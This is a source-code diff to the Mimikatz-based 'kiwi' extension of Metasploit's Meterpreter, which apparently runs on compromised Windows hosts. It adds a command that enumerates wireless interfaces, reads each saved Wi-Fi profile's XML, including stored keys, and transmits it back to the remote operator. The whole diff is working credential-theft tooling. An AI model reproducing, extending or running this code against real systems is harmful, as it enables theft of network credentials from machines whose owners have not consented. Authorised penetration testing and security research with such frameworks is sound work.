Added support for wifi profile cred extraction

c/meterpreter/source/extensions/kiwi/mimikatz/main.c

@@ -21,6 +21,7 @@ DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet);
 DWORD request_kerberos_ticket_purge(Remote *remote, Packet *packet);
 DWORD request_kerberos_ticket_list(Remote *remote, Packet *packet);
 DWORD request_lsa_dump_secrets(Remote *remote, Packet *packet);
+DWORD request_wifi_profile_list(Remote *remote, Packet *packet);
 
 /*! @brief The enabled commands for this extension. */
 Command customCommands[] =
@@ -31,6 +32,7 @@ Command customCommands[] =
     COMMAND_REQ("kiwi_kerberos_ticket_purge", request_kerberos_ticket_purge),
     COMMAND_REQ("kiwi_kerberos_ticket_list", request_kerberos_ticket_list),
     COMMAND_REQ("kiwi_lsa_dump_secrets", request_lsa_dump_secrets),
+    COMMAND_REQ("kiwi_wifi_profile_list", request_wifi_profile_list),
     COMMAND_TERMINATOR
 };
 
@@ -186,6 +188,23 @@ DWORD request_scrape_passwords(Remote *remote, Packet *packet)
 	return ERROR_SUCCESS;
 }
 
+/*!
+ * @brief Handler for request to list all wifi profiles/secrets.
+ * @param remote Pointer to the \c Remote instance.
+ * @param packet Pointer to the incoming packet.
+ * @returns \c ERROR_SUCCESS
+ */
+DWORD request_wifi_profile_list(Remote *remote, Packet *packet)
+{
+	DWORD result;
+	Packet * response = packet_create_response(packet);
+
+	result = mimikatz_wifi_profile_list(response);
+	packet_transmit_response(result, remote, response);
+
+	return ERROR_SUCCESS;
+}
+
 /*!
  * @brief Initialises the server extension.
  * @param remote Pointer to the \c Remote instance.

c/meterpreter/source/extensions/kiwi/mimikatz/main.h

@@ -74,4 +74,12 @@
 #define TLV_TYPE_KIWI_KERB_TKT_FLAGS        MAKE_CUSTOM_TLV(TLV_META_TYPE_UINT,   TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 70)
 #define TLV_TYPE_KIWI_KERB_TKT_RAW          MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW,    TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 71)
 
+#define TLV_TYPE_KIWI_WIFI_INT              MAKE_CUSTOM_TLV(TLV_META_TYPE_GROUP,  TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 75)
+#define TLV_TYPE_KIWI_WIFI_INT_GUID         MAKE_CUSTOM_TLV(TLV_META_TYPE_RAW,    TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 76)
+#define TLV_TYPE_KIWI_WIFI_INT_STATE        MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 77)
+#define TLV_TYPE_KIWI_WIFI_INT_DESC         MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 78)
+#define TLV_TYPE_KIWI_WIFI_PROFILE          MAKE_CUSTOM_TLV(TLV_META_TYPE_GROUP,  TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 79)
+#define TLV_TYPE_KIWI_WIFI_PROFILE_NAME     MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 80)
+#define TLV_TYPE_KIWI_WIFI_PROFILE_XML      MAKE_CUSTOM_TLV(TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_KIWI, TLV_EXTENSIONS + 81)
+
 #endif

c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.c

@@ -24,6 +24,7 @@
 // strings before passing them back to Metasploit. I wanted to avoid this hence instead I'm tapping into
 // Mimikatz via callback functions.
 #include "modules\kuhl_m_lsadump_struct.h"
+#include "modules\kuhl_m_misc_struct.h"
 #include "modules\kerberos\khul_m_kerberos_struct.h"
 
 typedef void (CALLBACK * PKUHL_M_SEKURLSA_EXTERNAL) (IN CONST PLUID luid, IN CONST PUNICODE_STRING username, IN CONST PUNICODE_STRING domain, IN CONST PUNICODE_STRING password, IN CONST PBYTE lm, IN CONST PBYTE ntlm, IN OUT LPVOID pvData);
@@ -45,6 +46,14 @@ extern LONG kuhl_m_kerberos_use_ticket(PBYTE fileData, DWORD fileSize);
 extern LONG kuhl_m_kerberos_create_golden_ticket(PCWCHAR szUser, PCWCHAR szDomain, PCWCHAR szSid, PCWCHAR szNtlm,
 	DWORD dwId, DWORD* pdwGroups, DWORD dwGroupCount, PBYTE* ticketBuffer, DWORD* ticketBufferSize);
 extern LONG kuhl_m_kerberos_purge_ticket();
+extern LONG kuhl_m_misc_wifi_enum(PWIFI_CALLBACK_CTX callbackCtx);
+
+/* @brief Helper struct that contains the context used when parsing wifi profiles. */
+typedef struct _WIFI_CONTEXT
+{
+	Packet* pResponse;
+	Packet* pInterface;
+} WIFI_CONTEXT, *PWIFI_CONTEXT;
 
 /*!
  * @brief Attempt to determine if the given string is a valid Unicode string.
@@ -592,4 +601,57 @@ DWORD mimikatz_lsa_dump_secrets(Packet* pResponse)
 	callbackCtx.pSamHashHandler = sam_hash_handler;
 
 	return kuhl_m_lsadump_full(&callbackCtx);
-}
+}
+
+VOID StartInterfaceHandler(LPVOID lpCtx, GUID* pGuid, LPCWSTR lpState, LPCWSTR lpDescription)
+{
+	PWIFI_CONTEXT pWifi = (PWIFI_CONTEXT)lpCtx;
+
+	pWifi->pInterface = packet_create_group();
+
+	packet_add_tlv_raw(pWifi->pInterface, TLV_TYPE_KIWI_WIFI_INT_GUID, pGuid, sizeof(GUID));
+	packet_add_tlv_wstring(pWifi->pInterface, TLV_TYPE_KIWI_WIFI_INT_DESC, lpDescription);
+	packet_add_tlv_wstring(pWifi->pInterface, TLV_TYPE_KIWI_WIFI_INT_STATE, lpState);
+}
+
+VOID ProfileHandler(LPVOID lpCtx, LPCWSTR lpProfileName, LPCWSTR lpProfileXml)
+{
+	PWIFI_CONTEXT pWifi = (PWIFI_CONTEXT)lpCtx;
+
+	Packet* pProfile = packet_create_group();
+
+	packet_add_tlv_wstring(pProfile, TLV_TYPE_KIWI_WIFI_PROFILE_NAME, lpProfileName);
+	packet_add_tlv_wstring(pProfile, TLV_TYPE_KIWI_WIFI_PROFILE_XML, lpProfileXml);
+
+	packet_add_group(pWifi->pInterface, TLV_TYPE_KIWI_WIFI_PROFILE, pProfile);
+}
+
+VOID EndInterfaceHandler(LPVOID lpCtx)
+{
+	PWIFI_CONTEXT pWifi = (PWIFI_CONTEXT)lpCtx;
+
+	packet_add_group(pWifi->pResponse, TLV_TYPE_KIWI_WIFI_INT, pWifi->pInterface);
+	pWifi->pInterface = NULL;
+}
+
+/*!
+ * @brief Enumerate/list wifi profiles on the target.
+ * @param pResponse Pointer to the packet that will contain the response.
+ * @returns Indication of success or failure.
+ */
+DWORD mimikatz_wifi_profile_list(Packet* pResponse)
+{
+	WIFI_CALLBACK_CTX callbackCtx;
+	WIFI_CONTEXT ctx;
+	ZeroMemory(&callbackCtx, sizeof(callbackCtx));
+	ZeroMemory(&ctx, sizeof(ctx));
+
+	ctx.pResponse = pResponse;
+
+	callbackCtx.lpCtx = &ctx;
+	callbackCtx.pStartInterfaceHandler = StartInterfaceHandler;
+	callbackCtx.pEndInterfaceHandler = EndInterfaceHandler;
+	callbackCtx.pProfileHandler = ProfileHandler;
+
+	return kuhl_m_misc_wifi_enum(&callbackCtx);
+}

c/meterpreter/source/extensions/kiwi/mimikatz/mimikatz_interface.h

@@ -15,5 +15,6 @@ DWORD mimikatz_kerberos_ticket_use(BYTE* pBuffer, DWORD dwBufferSize);
 DWORD mimikatz_kerberos_ticket_purge();
 DWORD mimikatz_kerberos_ticket_list(BOOL bExport, Packet* pResponse);
 DWORD mimikatz_lsa_dump_secrets(Packet* pResponse);
+DWORD mimikatz_wifi_profile_list(Packet* pResponse);
 
 #endif

c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_misc.c

@@ -281,16 +281,17 @@ BOOL kuhl_m_misc_generic_nogpo_patch(PCWSTR commandLine, PWSTR disableString, SI
 }
 
 const wchar_t * KUHL_M_MISC_WIFI_STATE[] = {
-	L"not_ready",
-	L"connected",
-	L"ad_hoc_network_formed",
-	L"disconnecting",
-	L"disconnected",
-	L"associating",
-	L"discovering",
-	L"authenticating",
+	L"Not Ready",
+	L"Connected",
+	L"Ad-Hoc Network Formed",
+	L"Disconnecting",
+	L"Disconnected",
+	L"Associating",
+	L"Discovering",
+	L"Authenticating",
 };
-NTSTATUS kuhl_m_misc_wifi(int argc, wchar_t * argv[])
+
+NTSTATUS kuhl_m_misc_wifi_enum(PWIFI_CALLBACK_CTX callbackCtx)
 {
 	PWLAN_INTERFACE_INFO_LIST pInterfaceList;
 	PWLAN_PROFILE_INFO_LIST pProfileList;
@@ -303,6 +304,12 @@ NTSTATUS kuhl_m_misc_wifi(int argc, wchar_t * argv[])
 		{
 			for(pInterfaceList->dwIndex = 0; pInterfaceList->dwIndex < pInterfaceList->dwNumberOfItems; pInterfaceList->dwIndex++)
 			{
+				if (callbackCtx && callbackCtx->pStartInterfaceHandler)
+					callbackCtx->pStartInterfaceHandler(callbackCtx->lpCtx,
+						&pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].InterfaceGuid,
+						KUHL_M_MISC_WIFI_STATE[pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].isState],
+						pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].strInterfaceDescription);
+
 				kprintf(L" * ");
 				kull_m_string_displayGUID(&pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].InterfaceGuid);
 				kprintf(L" / %s - %s\n", KUHL_M_MISC_WIFI_STATE[pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].isState], pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].strInterfaceDescription);
@@ -318,14 +325,26 @@ NTSTATUS kuhl_m_misc_wifi(int argc, wchar_t * argv[])
 						{
 							//kprintf(L"%08x\n", pdwFlags);
 							kprintf(L"%s\n", pstrProfileXml);
+							if (callbackCtx && callbackCtx->pProfileHandler)
+								callbackCtx->pProfileHandler(callbackCtx->lpCtx, pProfileList->ProfileInfo[pProfileList->dwIndex].strProfileName, pstrProfileXml);
 							WlanFreeMemory(pstrProfileXml);
 						}
+						else if (callbackCtx && callbackCtx->pProfileHandler)
+							callbackCtx->pProfileHandler(callbackCtx->lpCtx, pProfileList->ProfileInfo[pProfileList->dwIndex].strProfileName, NULL);
 					}
 					WlanFreeMemory(pProfileList);
 				}
+
+				if (callbackCtx && callbackCtx->pEndInterfaceHandler)
+					callbackCtx->pEndInterfaceHandler(callbackCtx->lpCtx);
 			}
 			WlanFreeMemory(pInterfaceList);
 		}
 	}
 	return STATUS_SUCCESS;
+}
+
+NTSTATUS kuhl_m_misc_wifi(int argc, wchar_t * argv[])
+{
+	return kuhl_m_misc_wifi_enum(NULL);
 }

c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_misc.h

@@ -9,6 +9,7 @@
 #include "../modules/kull_m_memory.h"
 #include "../modules/kull_m_patch.h"
 #include "../modules/kull_m_file.h"
+#include "kuhl_m_misc_struct.h"
 
 const KUHL_M kuhl_m_misc;
 
@@ -79,4 +80,4 @@ typedef DWORD	(WINAPI * PWLANCLOSEHANDLE)		(IN HANDLE hClientHandle, IN PVOID pR
 typedef DWORD	(WINAPI * PWLANENUMINTERFACES)	(IN HANDLE hClientHandle, IN PVOID pReserved, OUT PWLAN_INTERFACE_INFO_LIST *ppInterfaceList);
 typedef DWORD	(WINAPI * PWLANGETPROFILELIST)	(IN HANDLE hClientHandle, IN LPCGUID pInterfaceGuid, IN PVOID pReserved, OUT PWLAN_PROFILE_INFO_LIST *ppProfileList);
 typedef DWORD	(WINAPI * PWLANGETPROFILE)		(IN HANDLE hClientHandle, IN LPCGUID pInterfaceGuid, IN LPCWSTR strProfileName, IN PVOID pReserved, IN LPWSTR *pstrProfileXml, IN OUT OPTIONAL DWORD *pdwFlags, OUT OPTIONAL PDWORD pdwGrantedAccess);
-typedef VOID	(WINAPI * PWLANFREEMEMORY)		(IN PVOID pMemory);
+typedef VOID	(WINAPI * PWLANFREEMEMORY)		(IN PVOID pMemory);

c/meterpreter/source/extensions/kiwi/mimikatz/modules/kuhl_m_misc_struct.h

@@ -0,0 +1,9 @@
+#pragma once
+
+typedef struct _WIFI_CALLBACK_CTX
+{
+	LPVOID lpCtx;
+	VOID (*pStartInterfaceHandler)(LPVOID lpCtx, GUID* pGuid, LPCWSTR lpDescription, LPCWSTR lpState);
+	VOID (*pProfileHandler)(LPVOID lpCtx, LPCWSTR lpProfileName, LPCWSTR lpProfileXml);
+	VOID (*pEndInterfaceHandler)(LPVOID lpCtx);
+} WIFI_CALLBACK_CTX, *PWIFI_CALLBACK_CTX;

c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj

@@ -591,6 +591,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
     <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_kernel.h" />
     <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump_struct.h" />
     <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_misc.h" />
+    <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_misc_struct.h" />
     <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_net.h" />
     <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_privilege.h" />
     <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_process.h" />

c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj.filters

@@ -155,6 +155,9 @@
     <ClInclude Include="..\..\source\extensions\kiwi\modules\kull_m_samlib.h">
       <Filter>common</Filter>
     </ClInclude>
+    <ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_misc_struct.h">
+      <Filter>modules</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c">